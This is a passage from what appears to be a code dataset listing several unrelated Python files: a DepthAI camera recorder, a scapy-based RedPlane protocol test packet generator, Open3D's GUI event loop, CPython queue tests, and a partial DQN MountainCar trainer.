source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
depthai_record.py
|
#!/usr/bin/env python3
from pathlib import Path
from multiprocessing import Queue
from threading import Thread
import depthai as dai
from enum import Enum
import cv2
class EncodingQuality(Enum):
BEST = 1 # Lossless MJPEG
HIGH = 2 # MJPEG Quality=97 (default)
MEDIUM = 3 # MJPEG Quality=93
LOW = 4 # H265 BitrateKbps=10000
class Record():
def __init__(self, path: Path, device) -> None:
self.save = ['color', 'left', 'right']
self.fps = 30
self.timelapse = -1
self.device = device
self.quality = EncodingQuality.HIGH
self.rotate = -1
self.preview = False
self.stereo = 1 < len(device.getConnectedCameras())
self.mxid = device.getMxId()
self.path = self.create_folder(path, self.mxid)
calibData = device.readCalibration()
calibData.eepromToJsonFile(str(self.path / "calib.json"))
self.convert_mp4 = False
def run(self):
files = {}
def create_video_file(name):
if name == 'depth': # or (name=='color' and 'depth' in self.save):
files[name] = self.depthAiBag
else:
ext = 'h265' if self.quality == EncodingQuality.LOW else 'mjpeg'
files[name] = open(str(self.path / f"{name}.{ext}"), 'wb')
# if name == "color": fourcc = "I420"
# elif name == "depth": fourcc = "Y16 " # 16-bit uncompressed greyscale image
# else : fourcc = "GREY" #Simple, single Y plane for monochrome images.
# files[name] = VideoWriter(str(path / f"{name}.avi"), VideoWriter_fourcc(*fourcc), fps, sizes[name], isColor=name=="color")
while True:
try:
frames = self.frame_q.get()
if frames is None:
break
for name in frames:
if name not in files: # File wasn't created yet
create_video_file(name)
# if self.rotate != -1: # Doesn't work atm
# frames[name] = cv2.rotate(frames[name], self.rotate)
files[name].write(frames[name])
# frames[name].tofile(files[name])
except KeyboardInterrupt:
break
# Close all files - Can't use ExitStack with VideoWriter
for name in files:
files[name].close()
print('Exiting store frame thread')
def start(self):
if not self.stereo: # If device doesn't have stereo camera pair
if "left" in self.save: self.save.remove("left")
if "right" in self.save: self.save.remove("right")
if "disparity" in self.save: self.save.remove("disparity")
if "depth" in self.save: self.save.remove("depth")
if self.preview: self.save.append('preview')
if 0 < self.timelapse:
self.fps = 5
self.pipeline, self.nodes = self.create_pipeline()
if "depth" in self.save:
from libraries.depthai_rosbags import DepthAiBags
res = ['depth']
# If rotate 90 degrees
if self.rotate in [0,2]: res = (res[1], res[0])
self.depthAiBag = DepthAiBags(self.path, self.device, self.get_sizes(), rgb='color' in self.save)
self.frame_q = Queue(20)
self.process = Thread(target=self.run)
self.process.start()
self.device.startPipeline(self.pipeline)
self.queues = []
maxSize = 1 if 0 < self.timelapse else 10
for stream in self.save:
self.queues.append({
'q': self.device.getOutputQueue(name=stream, maxSize=maxSize, blocking=False),
'msgs': [],
'name': stream,
'mxid': self.mxid
})
def set_fps(self, fps):
self.fps = fps
def set_timelapse(self, timelapse):
self.timelapse = timelapse
def set_quality(self, quality: EncodingQuality):
self.quality = quality
def set_preview(self, preview: bool):
self.preview = preview
'''
Available values for `angle`:
- cv2.ROTATE_90_CLOCKWISE (0)
- cv2.ROTATE_180 (1)
- cv2.ROTATE_90_COUNTERCLOCKWISE (2)
'''
def set_rotate(self, angle):
raise Exception("Rotating not yet supported!")
# Currently RealSense Viewer throws error "memory access violation". Debug.
self.rotate = angle
# Which streams to save to the disk (on the host)
def set_save_streams(self, save_streams):
self.save = save_streams
print('save', self.save)
def get_sizes(self):
dict = {}
if "color" in self.save: dict['color'] = self.nodes['color'].getVideoSize()
if "right" in self.save: dict['right'] = self.nodes['right'].getResolutionSize()
if "left" in self.save: dict['left'] = self.nodes['left'].getResolutionSize()
if "disparity" in self.save: dict['disparity'] = self.nodes['left'].getResolutionSize()
if "depth" in self.save: dict['depth'] = self.nodes['left'].getResolutionSize()
return dict
def create_folder(self, path: Path, mxid: str):
i = 0
while True:
i += 1
recordings_path = path / f"{i}-{str(mxid)}"
if not recordings_path.is_dir():
recordings_path.mkdir(parents=True, exist_ok=False)
return recordings_path
def create_pipeline(self):
pipeline = dai.Pipeline()
nodes = {}
def create_mono(name):
nodes[name] = pipeline.createMonoCamera()
nodes[name].setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
socket = dai.CameraBoardSocket.LEFT if name == "left" else dai.CameraBoardSocket.RIGHT
nodes[name].setBoardSocket(socket)
nodes[name].setFps(self.fps)
def stream_out(name, fps, out, noEnc=False):
# Create XLinkOutputs for the stream
xout = pipeline.createXLinkOut()
xout.setStreamName(name)
if noEnc:
out.link(xout.input)
return
encoder = pipeline.createVideoEncoder()
profile = dai.VideoEncoderProperties.Profile.H265_MAIN if self.quality == EncodingQuality.LOW else dai.VideoEncoderProperties.Profile.MJPEG
encoder.setDefaultProfilePreset(fps, profile)
if self.quality == EncodingQuality.BEST:
encoder.setLossless(True)
elif self.quality == EncodingQuality.HIGH:
encoder.setQuality(97)
elif self.quality == EncodingQuality.MEDIUM:
encoder.setQuality(93)
elif self.quality == EncodingQuality.LOW:
encoder.setBitrateKbps(10000)
out.link(encoder.input)
encoder.bitstream.link(xout.input)
if "color" in self.save:
nodes['color'] = pipeline.createColorCamera()
nodes['color'].setBoardSocket(dai.CameraBoardSocket.RGB)
# RealSense Viewer expects RGB color order
nodes['color'].setColorOrder(dai.ColorCameraProperties.ColorOrder.RGB)
nodes['color'].setResolution(dai.ColorCameraProperties.SensorResolution.THE_4_K)
nodes['color'].setIspScale(1,2) # 1080P
nodes['color'].setFps(self.fps)
if self.preview:
nodes['color'].setPreviewSize(640, 360)
stream_out("preview", None, nodes['color'].preview, noEnc=True)
# TODO change out to .isp instead of .video when ImageManip will support I420 -> NV12
# Don't encode color stream if we save depth; as we will be saving color frames in rosbags as well
stream_out("color", nodes['color'].getFps(), nodes['color'].video) #, noEnc='depth' in self.save)
if True in (el in ["left", "disparity", "depth"] for el in self.save):
create_mono("left")
if "left" in self.save:
stream_out("left", nodes['left'].getFps(), nodes['left'].out)
if True in (el in ["right", "disparity", "depth"] for el in self.save):
create_mono("right")
if "right" in self.save:
stream_out("right", nodes['right'].getFps(), nodes['right'].out)
if True in (el in ["disparity", "depth"] for el in self.save):
nodes['stereo'] = pipeline.createStereoDepth()
nodes['stereo'].initialConfig.setConfidenceThreshold(255)
nodes['stereo'].initialConfig.setMedianFilter(dai.StereoDepthProperties.MedianFilter.KERNEL_7x7)
# TODO: configurable
nodes['stereo'].setLeftRightCheck(True)
nodes['stereo'].setExtendedDisparity(False)
if "disparity" not in self.save and "depth" in self.save:
nodes['stereo'].setSubpixel(True) # For better depth visualization
# if "depth" and "color" in self.save: # RGB depth alignment
# nodes['color'].setIspScale(1,3) # 4k -> 720P
# # For now, RGB needs fixed focus to properly align with depth.
# # This value was used during calibration
# nodes['color'].initialControl.setManualFocus(130)
# nodes['stereo'].setDepthAlign(dai.CameraBoardSocket.RGB)
nodes['left'].out.link(nodes['stereo'].left)
nodes['right'].out.link(nodes['stereo'].right)
if "disparity" in self.save:
stream_out("disparity", nodes['right'].getFps(), nodes['stereo'].disparity)
if "depth" in self.save:
stream_out('depth', None, nodes['stereo'].depth, noEnc=True)
self.nodes = nodes
self.pipeline = pipeline
return pipeline, nodes
|
pktgen.py
|
#!/usr/bin/python
######################################################
# Copyright (C) Microsoft. All rights reserved. #
######################################################
import os
import sys
import random
import threading
if os.getuid() !=0:
print """
ERROR: This script requires root privileges.
Use 'sudo' to run it.
"""
quit()
from scapy.all import *
flow_vals = {}
NUM_TEST_KEYS = 1000
txn_type_enum = { 0x0: "LEASE_NEW_REQ", 0x1: "LEASE_RENEW_REQ",
0x2: "LEASE_NEW_ACK", 0x3: "LEASE_RENEW_ACK",
0x4: "LEASE_MIGRATE_ACK" }
class RedplaneAck (Packet):
name = "RedPlane ACK header"
fields_desc = [ BitEnumField("ack_type", 0, 8, txn_type_enum),
BitField("seq_num", 0, 32),
BitField("lease_expire_time", 0, 32),
BitField("flow_key", 0, 104)
]
class RedplaneState (Packet):
name = "RedPlane State header"
fields_desc = [ BitField("State", 0, 32)
]
bind_layers(UDP, RedplaneAck, dport=4000)
bind_layers(RedplaneAck, RedplaneState, ack_type=0x4)
bind_layers(RedplaneState, IP)
bind_layers(RedplaneAck, IP, ack_type=0x2)
bind_layers(RedplaneAck, IP, ack_type=0x3)
class RedplaneTxn (Packet):
name = "RedPlane transaction header"
fields_desc = [ BitEnumField("txn_type", 0, 8, txn_type_enum),
BitField("seq_num", 0, 32),
BitField("flow_key", 0, 104),
BitField("flow_value", 0, 32)
]
bind_layers(UDP, RedplaneTxn, sport=4000)
bind_layers(RedplaneTxn, IP)
# Send txn from a switch to a state store
def send_write_txn (src_ip, dst_ip, dest_port, flow_key, flow_val, txn_type, seq_num, payload_size):
p = (Ether()/
IP(dst=dst_ip, src=src_ip)/
UDP(sport=4000, dport=dest_port)/
RedplaneTxn(txn_type=txn_type, seq_num=seq_num, flow_key=flow_key, flow_value=flow_val)/
IP()/
#TCP()/
Raw(RandString(size=payload_size)))
sendp(p, iface="ens1", count = 1)
def send_read_txn (src_ip, dst_ip, dest_port, txn_type, seq_num):
p = (Ether()/
IP(dst=dst_ip, src=src_ip)/
UDP(sport=4000, dport=dest_port)/
RedplaneTxn(txn_type=txn_type, seq_num=seq_num, flow_key=0))
sendp(p, iface="ens1", count = 1)
def print_pkt (pkt):
flow_key = int(pkt[RedplaneAck].flow_key)
assert(flow_vals[flow_key] == int(pkt[RedplaneState].State))
def sniff_thread():
sniff (iface="ens1", filter='udp dst port 4000', prn=print_pkt, count = NUM_TEST_KEYS)
if __name__ == "__main__":
payload_size = int(sys.argv[1])
flow_keys = []
print ("LEASE_NEW_REQ")
# send LEASE_NEW_REQ
for i in range(0, NUM_TEST_KEYS):
while True:
flow_key = random.getrandbits(104)
if flow_key in flow_keys:
continue
flow_keys.append(flow_key)
break
send_write_txn ("198.19.10.0","198.19.11.0", 4001, flow_key, 0, 0x0, 0, payload_size)
print ("LEASE_RENEW_REQ (WRITE)")
# send LEASE_RENEW_REQ (WRITE)
accessed = []
count = 0
while True:
idx = random.randint(0, NUM_TEST_KEYS-1)
if idx in accessed:
continue
flow_val = random.getrandbits(32)
send_write_txn ("198.19.10.0","198.19.11.0", 4001, flow_keys[idx], flow_val, 0x1, 1, payload_size)
accessed.append(idx)
flow_vals[flow_keys[idx]] = flow_val
count = count + 1
if count == NUM_TEST_KEYS:
break
print ("LEASE_NEW_REQ (MIGRATE))")
## send LEASE_NEW_REQ (MIGRATE)
sniff_th = threading.Thread(target=sniff_thread, args=())
sniff_th.start()
time.sleep(1)
for i in range(0, NUM_TEST_KEYS):
send_write_txn ("198.19.10.0","198.19.11.0", 4001, flow_keys[i], 0, 0x0, 0, payload_size)
sniff_th.join()
|
async_event_loop.py
|
# ----------------------------------------------------------------------------
# - Open3D: www.open3d.org -
# ----------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2018-2021 www.open3d.org
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# ----------------------------------------------------------------------------
"""Run the GUI event loop in a non-main thread. This allows using the
GUI from plugins to other apps (e.g.: Jupyter or Tensorboard) where the GUI
cannot be started in the main thread. Currently does not work in macOS.
.. note:: This is a singleton class implemented with this module as a
holder. The ``async_event_loop`` singleton is started whenever this
module is imported. If you are using remote visualization with WebRTC,
you must call ``enable_webrtc()`` before importing this module.
"""
import threading
from collections import deque
import open3d as o3d
class _AsyncEventLoop:
class _Task:
_g_next_id = 0
def __init__(self, func, *args, **kwargs):
self.task_id = self._g_next_id
self.func = func, args, kwargs
_AsyncEventLoop._Task._g_next_id += 1
def __init__(self):
# TODO (yixing): find a better solution. Currently py::print acquires
# GIL which causes deadlock when AsyncEventLoop is used. By calling
# reset_print_function(), all C++ prints will be directed to the
# terminal while python print will still remain in the cell.
o3d.utility.reset_print_function()
self._lock = threading.Lock()
self._cv = threading.Condition(self._lock)
self._run_queue = deque()
self._return_vals = {}
self._started = False
self._start()
def _start(self):
if not self._started:
self._thread = threading.Thread(name="GUIMain",
target=self._thread_main)
self._thread.start()
self._started = True
def run_sync(self, func, *args, **kwargs):
"""Enqueue task, wait for completion and return result. Can run in any
thread."""
from open3d.visualization.tensorboard_plugin.util import _log
if not self._started:
raise RuntimeError("GUI thread has exited.")
with self._lock:
task = _AsyncEventLoop._Task(func, *args, **kwargs)
_log.debug(f"[async_event_loop] Enqueue {func.__name__} with args:"
f" {args} {kwargs}")
self._run_queue.append(task)
while True:
with self._cv:
self._cv.wait_for(lambda: task.task_id in self._return_vals)
with self._lock:
_log.debug(f"[async_event_loop] Completed {func.__name__}")
return self._return_vals.pop(task.task_id)
def _thread_main(self):
"""Main GUI thread event loop"""
app = o3d.visualization.gui.Application.instance
app.initialize()
done = False
while not done:
while len(self._run_queue) > 0:
with self._lock:
task = self._run_queue.popleft()
func, args, kwargs = task.func
retval = func(*args, **kwargs)
with self._cv:
self._return_vals[task.task_id] = retval
self._cv.notify_all()
done = not app.run_one_tick()
self._started = False # Main GUI thread has exited
# The _AsyncEventLoop class shall only be used to create a singleton instance.
# There are different ways to achieve this, here we use the module as a holder
# for singleton variables, see: https://stackoverflow.com/a/31887/1255535.
async_event_loop = _AsyncEventLoop()
|
test_queue.py
|
# Some simple queue module tests, plus some failure conditions
# to ensure the Queue locks remain stable.
import itertools
import random
import threading
import time
import unittest
import weakref
from test import support
from test.support import import_helper
py_queue = import_helper.import_fresh_module('queue', blocked=['_queue'])
c_queue = import_helper.import_fresh_module('queue', fresh=['_queue'])
need_c_queue = unittest.skipUnless(c_queue, "No _queue module found")
QUEUE_SIZE = 5
def qfull(q):
return q.maxsize > 0 and q.qsize() == q.maxsize
# A thread to run a function that unclogs a blocked Queue.
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
# Execute a function that blocks, and in a separate thread, a function that
# triggers the release. Returns the result of the blocking function. Caution:
# block_func must guarantee to block until trigger_func is called, and
# trigger_func must guarantee to change queue state so that block_func can make
# enough progress to return. In particular, a block_func that just raises an
# exception regardless of whether trigger_func is called will lead to
# timing-dependent sporadic failures, and one of those went rarely seen but
# undiagnosed for years. Now block_func must be unexceptional. If block_func
# is supposed to raise an exception, call do_exceptional_blocking_test()
# instead.
class BlockingTestMixin:
def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args):
thread = _TriggerThread(trigger_func, trigger_args)
thread.start()
try:
self.result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not thread.startedEvent.is_set():
self.fail("blocking function %r appeared not to block" %
block_func)
return self.result
finally:
support.join_thread(thread, 10) # make sure the thread terminates
# Call this instead if block_func is supposed to raise an exception.
def do_exceptional_blocking_test(self,block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
thread = _TriggerThread(trigger_func, trigger_args)
thread.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail("expected exception of kind %r" %
expected_exception_class)
finally:
support.join_thread(thread, 10) # make sure the thread terminates
if not thread.startedEvent.is_set():
self.fail("trigger thread ended but event never set")
class BaseQueueTestMixin(BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def basic_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
self.assertTrue(q.empty())
self.assertFalse(q.full())
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(333)
q.put(222)
target_order = dict(Queue = [111, 333, 222],
LifoQueue = [222, 333, 111],
PriorityQueue = [111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEqual(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
self.assertTrue(q.qsize(), "Queue should not be empty")
self.assertTrue(not qfull(q), "Queue should not be full")
last = 2 * QUEUE_SIZE
full = 3 * 2 * QUEUE_SIZE
q.put(last)
self.assertTrue(qfull(q), "Queue should be full")
self.assertFalse(q.empty())
self.assertTrue(q.full())
try:
q.put(full, block=0)
self.fail("Didn't appear to block with a full queue")
except self.queue.Full:
pass
try:
q.put(full, timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except self.queue.Full:
pass
# Test a blocking put
self.do_blocking_test(q.put, (full,), q.get, ())
self.do_blocking_test(q.put, (full, True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except self.queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except self.queue.Empty:
pass
# Test a blocking get
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x < 0:
q.task_done()
return
with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
threads = []
for i in (0,1):
thread = threading.Thread(target=self.worker, args=(q,))
thread.start()
threads.append(thread)
for i in range(100):
q.put(i)
q.join()
self.assertEqual(self.cum, sum(range(100)),
"q.join() did not block until all tasks were done")
for i in (0,1):
q.put(-1) # instruct the threads to close
q.join() # verify that you can join twice
for thread in threads:
thread.join()
def test_queue_task_done(self):
# Test to make sure a queue task completed successfully.
q = self.type2test()
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_queue_join(self):
# Test that a queue join()s successfully, and before anything else
# (done twice for insurance).
q = self.type2test()
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_basic(self):
# Do it a couple of times on the same queue.
# Done twice to make sure works with same instance reused.
q = self.type2test(QUEUE_SIZE)
self.basic_queue_test(q)
self.basic_queue_test(q)
def test_negative_timeout_raises_exception(self):
q = self.type2test(QUEUE_SIZE)
with self.assertRaises(ValueError):
q.put(1, timeout=-1)
with self.assertRaises(ValueError):
q.get(1, timeout=-1)
def test_nowait(self):
q = self.type2test(QUEUE_SIZE)
for i in range(QUEUE_SIZE):
q.put_nowait(1)
with self.assertRaises(self.queue.Full):
q.put_nowait(1)
for i in range(QUEUE_SIZE):
q.get_nowait()
with self.assertRaises(self.queue.Empty):
q.get_nowait()
def test_shrinking_queue(self):
# issue 10110
q = self.type2test(3)
q.put(1)
q.put(2)
q.put(3)
with self.assertRaises(self.queue.Full):
q.put_nowait(4)
self.assertEqual(q.qsize(), 3)
q.maxsize = 2 # shrink the queue
with self.assertRaises(self.queue.Full):
q.put_nowait(4)
class QueueTest(BaseQueueTestMixin):
def setUp(self):
self.type2test = self.queue.Queue
super().setUp()
class PyQueueTest(QueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CQueueTest(QueueTest, unittest.TestCase):
queue = c_queue
class LifoQueueTest(BaseQueueTestMixin):
def setUp(self):
self.type2test = self.queue.LifoQueue
super().setUp()
class PyLifoQueueTest(LifoQueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CLifoQueueTest(LifoQueueTest, unittest.TestCase):
queue = c_queue
class PriorityQueueTest(BaseQueueTestMixin):
def setUp(self):
self.type2test = self.queue.PriorityQueue
super().setUp()
class PyPriorityQueueTest(PriorityQueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CPriorityQueueTest(PriorityQueueTest, unittest.TestCase):
queue = c_queue
# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception): pass
class FailingQueueTest(BlockingTestMixin):
def setUp(self):
Queue = self.queue.Queue
class FailingQueue(Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException("You Lose")
return Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException("You Lose")
return Queue._get(self)
self.FailingQueue = FailingQueue
super().setUp()
def failing_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ("full",), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
q.get()
self.assertTrue(not qfull(q), "Queue should not be full")
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a blocking put
self.do_blocking_test(q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
def test_failing_queue(self):
# Test to make sure a queue is functioning correctly.
# Done twice to the same instance.
q = self.FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
class PyFailingQueueTest(FailingQueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CFailingQueueTest(FailingQueueTest, unittest.TestCase):
queue = c_queue
class BaseSimpleQueueTest:
def setUp(self):
self.q = self.type2test()
def feed(self, q, seq, rnd):
while True:
try:
val = seq.pop()
except IndexError:
return
q.put(val)
if rnd.random() > 0.5:
time.sleep(rnd.random() * 1e-3)
def consume(self, q, results, sentinel):
while True:
val = q.get()
if val == sentinel:
return
results.append(val)
def consume_nonblock(self, q, results, sentinel):
while True:
while True:
try:
val = q.get(block=False)
except self.queue.Empty:
time.sleep(1e-5)
else:
break
if val == sentinel:
return
results.append(val)
def consume_timeout(self, q, results, sentinel):
while True:
while True:
try:
val = q.get(timeout=1e-5)
except self.queue.Empty:
pass
else:
break
if val == sentinel:
return
results.append(val)
def run_threads(self, n_feeders, n_consumers, q, inputs,
feed_func, consume_func):
results = []
sentinel = None
seq = inputs + [sentinel] * n_consumers
seq.reverse()
rnd = random.Random(42)
exceptions = []
def log_exceptions(f):
def wrapper(*args, **kwargs):
try:
f(*args, **kwargs)
except BaseException as e:
exceptions.append(e)
return wrapper
feeders = [threading.Thread(target=log_exceptions(feed_func),
args=(q, seq, rnd))
for i in range(n_feeders)]
consumers = [threading.Thread(target=log_exceptions(consume_func),
args=(q, results, sentinel))
for i in range(n_consumers)]
with support.start_threads(feeders + consumers):
pass
self.assertFalse(exceptions)
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
return results
def test_basic(self):
# Basic tests for get(), put() etc.
q = self.q
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
q.put(1)
self.assertFalse(q.empty())
self.assertEqual(q.qsize(), 1)
q.put(2)
q.put_nowait(3)
q.put(4)
self.assertFalse(q.empty())
self.assertEqual(q.qsize(), 4)
self.assertEqual(q.get(), 1)
self.assertEqual(q.qsize(), 3)
self.assertEqual(q.get_nowait(), 2)
self.assertEqual(q.qsize(), 2)
self.assertEqual(q.get(block=False), 3)
self.assertFalse(q.empty())
self.assertEqual(q.qsize(), 1)
self.assertEqual(q.get(timeout=0.1), 4)
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
with self.assertRaises(self.queue.Empty):
q.get(block=False)
with self.assertRaises(self.queue.Empty):
q.get(timeout=1e-3)
with self.assertRaises(self.queue.Empty):
q.get_nowait()
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
def test_negative_timeout_raises_exception(self):
q = self.q
q.put(1)
with self.assertRaises(ValueError):
q.get(timeout=-1)
def test_order(self):
# Test a pair of concurrent put() and get()
q = self.q
inputs = list(range(100))
results = self.run_threads(1, 1, q, inputs, self.feed, self.consume)
# One producer, one consumer => results appended in well-defined order
self.assertEqual(results, inputs)
def test_many_threads(self):
# Test multiple concurrent put() and get()
N = 50
q = self.q
inputs = list(range(10000))
results = self.run_threads(N, N, q, inputs, self.feed, self.consume)
# Multiple consumers without synchronization append the
# results in random order
self.assertEqual(sorted(results), inputs)
def test_many_threads_nonblock(self):
# Test multiple concurrent put() and get(block=False)
N = 50
q = self.q
inputs = list(range(10000))
results = self.run_threads(N, N, q, inputs,
self.feed, self.consume_nonblock)
self.assertEqual(sorted(results), inputs)
def test_many_threads_timeout(self):
# Test multiple concurrent put() and get(timeout=...)
N = 50
q = self.q
inputs = list(range(1000))
results = self.run_threads(N, N, q, inputs,
self.feed, self.consume_timeout)
self.assertEqual(sorted(results), inputs)
def test_references(self):
# The queue should lose references to each item as soon as
# it leaves the queue.
class C:
pass
N = 20
q = self.q
for i in range(N):
q.put(C())
for i in range(N):
wr = weakref.ref(q.get())
self.assertIsNone(wr())
class PySimpleQueueTest(BaseSimpleQueueTest, unittest.TestCase):
queue = py_queue
def setUp(self):
self.type2test = self.queue._PySimpleQueue
super().setUp()
@need_c_queue
class CSimpleQueueTest(BaseSimpleQueueTest, unittest.TestCase):
queue = c_queue
def setUp(self):
self.type2test = self.queue.SimpleQueue
super().setUp()
def test_is_default(self):
self.assertIs(self.type2test, self.queue.SimpleQueue)
self.assertIs(self.type2test, self.queue.SimpleQueue)
def test_reentrancy(self):
# bpo-14976: put() may be called reentrantly in an asynchronous
# callback.
q = self.q
gen = itertools.count()
N = 10000
results = []
# This test exploits the fact that __del__ in a reference cycle
# can be called any time the GC may run.
class Circular(object):
def __init__(self):
self.circular = self
def __del__(self):
q.put(next(gen))
while True:
o = Circular()
q.put(next(gen))
del o
results.append(q.get())
if results[-1] >= N:
break
self.assertEqual(results, list(range(N + 1)))
if __name__ == "__main__":
unittest.main()
|
dqn_mountaincar.py
|
import os, sys, json
import numpy as np
import tensorflow as tf
import gym, time
import multiprocessing
import threading
from threading import Lock, Thread
from ql_method import dqn_method
from ql_networks import build_dense_network, build_dense_duel
np.random.seed(1)
tf.set_random_seed(1)
MEMORY_SIZE = 1000
layers=1
hiddens=20
lock = Lock()
tol_itr=0
def worker( pnum, COORD, env, dqn, steps, itr):
global tol_itr
print("Runnint worker-%d"%pnum)
for i in range(itr):
if COORD.should_stop()==True:
break
while (tol_itr// N_WORKERS) !=i:
time.sleep(0.1)
observation = env.reset()
ep_r= 0
for j in range(steps):
if pnum==0 and 10<i:
env.render()
action= dqn.choose_action(observation)
observation_, reward, done, info = env.step(action)
if done:
reward = 2
dqn.store_transition(observation, action, reward, observation_)
ep_r= 0.9*ep_r + 0.1*reward
if pnum==0 and j%500==0:
print('p%d %d, %5d Reward:%f'%(pnum, i, j, ep_r))
if j > MEMORY_SIZE : # learning
dqn.learn()
stp= j
if done:
break
observation = observation_
dqn.send_network()
lock.acquire()
tol_itr +=1
lock.release()
print('p%d %d( %d) total steps:%d reward:%f'%(pnum, i, tol_itr, stp, ep_r))
def a2dqn( steps, itr):
global N_WORKERS
N_WORKERS = multiprocessing.cpu_count()
sess = tf.Session()
#dqn_parent= dqn_method( build_dense_network, n_actions=env.action_space.n, n_features=env.observation_space.shape[0], layers=1, hiddens=20,
#memory_size=MEMORY_SIZE, replace_target_iter=300, e_greedy_increment=0.001)
e = gym.make('MountainCar-v0')
e = e.unwrapped
_, _, parent= build_dense_network( e.observation_space.shape[0], e.action_space.n , layers, hiddens, 'parent' )
env= []
dqn= []
for i in range(N_WORKERS):
e = gym.make('MountainCar-v0')
e = e.unwrapped
env.append( e)
